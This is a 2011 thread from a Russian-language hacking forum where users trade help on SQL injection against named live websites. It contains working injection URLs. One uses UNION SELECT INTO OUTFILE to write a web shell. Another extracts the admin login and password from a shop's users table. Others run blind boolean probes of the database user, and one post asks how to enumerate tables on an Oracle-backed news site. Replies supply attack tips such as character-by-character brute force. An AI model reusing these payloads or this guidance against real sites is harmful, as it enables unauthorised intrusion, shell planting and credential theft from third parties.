02.09.2011, 16:20
|
|
Новичок
Регистрация: 26.08.2011
Сообщений: 2
С нами:
7743926
Репутация:
0
|
|
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
|
|
|
02.09.2011, 16:36
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от gh0stface
pomogite plz eshe s takoi situaciei:
esli url yazvima i ya znau polnii put dla zaliva shell i znay chto v into outfile mojno ispolzovat kavichki, mojno li oboitis bes poiska colonok dla union a srazu popitatsa zalit shell v pervoi kolonke uniona, a ostalnie zakomentirovat:
site.com?id=-1+union+select+0x6F6C6F6C6F+INTO+OUTFILE+'/path/tst.txt'+--+
количество полей, используемых в запросе требуется найти для составления самого запроса, собственно. чтобы для сервера он был верным. в случае с INTO OUTFILE не нужно искать только принтабельные поля, т.к. мы вводим данные, а не выводим и можем сделать это через любое поле.
|
|
|
|
03.09.2011, 17:29
|
|
Новичок
Регистрация: 13.06.2011
Сообщений: 27
С нами:
7850486
Репутация:
7
|
|
Сообщение от Qwert321
Подскажите плз. При вставке квадратных скобок, начинает выдавать( я так понял тип запроса) Array - www.magazin.seti.ee/modules/Board/recherche.php?action=1&terme[] , а когда вписываешь %00 в скобки, то вообще запрос выдает нулевое. запрос делается по типу ...&terme="query" ...как раскрутить багу?
Логин и пасс админа.
Код:
http://www.magazin.seti.ee/modules/Board/index.php?pa=view&cid=78+limit+0+union+select+1,2,uname,pass,5,6,7,8,9,10,11+from+m_seti_users+limit+0,1%23
|
|
|
|
03.09.2011, 22:06
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Я пожалуй процитирую первый пост:
Сообщение от None
В этой и только в этой теме вы можете задать вопрос
про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках
(для остального есть поиск по форуму)
.
Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.
Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется
Здесь не центр первой помощи, и если кто-то хочет найти статью, мануал, фак, видео, заметку ЮЗАЙТЕ ПОИСК!
Здесь не школьный кабинет, в котором вам будут разжевывать детально как что-то использовать, ВАМ МОГУТ ПОМОЧЬ, но за вас НИКТО НИЧЕГО ДЕЛАТЬ НЕ БУДЕТ И НЕ ДОЛЖЕН.
Обращусь к людям кто отвечает на вопросы, я лично Вам очень благодарен, прекрасно понимаю, что значит грамотно и правильно объяснить задающему вопрос, ответ так, что бы он понял, но пожалуйста, повторюсь, пожалуйста, не решайте их проблемы за них, натолкните их на мысль, на правильное направление, но не давайте НИКОМУ готовых решений, потому, что люди этим пользуются, и не понимают, что они делают, и потом каждый раз приходят в эту тему и умоляют что бы за них кто-то подумал и сделал.
Обращусь к людям кто задает вопрос, будьте так любезны. перед тем как задать вопрос, используйте поиск по форуму, пробегитесь глазами по заголовкам прикрепленных тем, в большинстве случаев ответ на ваш вопрос уже дан, даже поговорка есть "семь раз отмерь, один отрежь", и действительно лучше самому семь раз подумать, и решить проблему, тем самым повысив свой боевой скил, чем каждый раз спрашивать одно и тоже. |
|
|
|
03.09.2011, 23:24
|
|
Новичок
Регистрация: 22.09.2010
Сообщений: 5
С нами:
8230646
Репутация:
0
|
|
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить select перед user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring(( SELECT user()),1,1))>=100,1,0)/*
то выдает ошибку
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
Может из-за версии mysql 3.23.44 ? |
|
|
|
03.09.2011, 23:49
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от LamerHacker
Помогите понять, в чем причина ошибки?
Так инъекция срабатывает
http://site.ru/index.php?a=50+and+1=if(ascii(substring((user()),1 ,1))>=100,1,0)/*
но если подставить
select
перед
user()
http://site.ru/index.php?a=50+and+1=if(ascii(substring((
SELECT
user()),1,1))>=100,1,0)/*
то выдает ошибку
Может из-за версии mysql 3.23.44 ?
Потому что (SELECT user()) будет является подзапросом, которые появились с версии 4.1. Так что да, ты прав, дело в версии.
|
|
|
|
04.09.2011, 01:39
|
|
Новичок
Регистрация: 22.09.2010
Сообщений: 5
С нами:
8230646
Репутация:
0
|
|
Спасибо
Из-за версии не получается так же подставить UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
|
|
|
|
04.09.2011, 01:52
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от LamerHacker
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
посимвольный брут
|
|
|
|
05.09.2011, 20:51
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
есть скуля
Код:
http://www.vgtrk.com/rnews.html?sid=86&id=4716
стоит oracle
подскажите как вывести таблицы и колонки? |
|
|
|
05.09.2011, 20:58
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от LamerHacker
Спасибо
Из-за версии не получается так же подставить
UNION SELECT
Я конечно сомневаюсь, но может есть способ вытащить данные из нужных таблиц без использования UNION SELECT?
https://rdot.org/forum/showthread.php?t=503
__________________
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Комбинированный вид
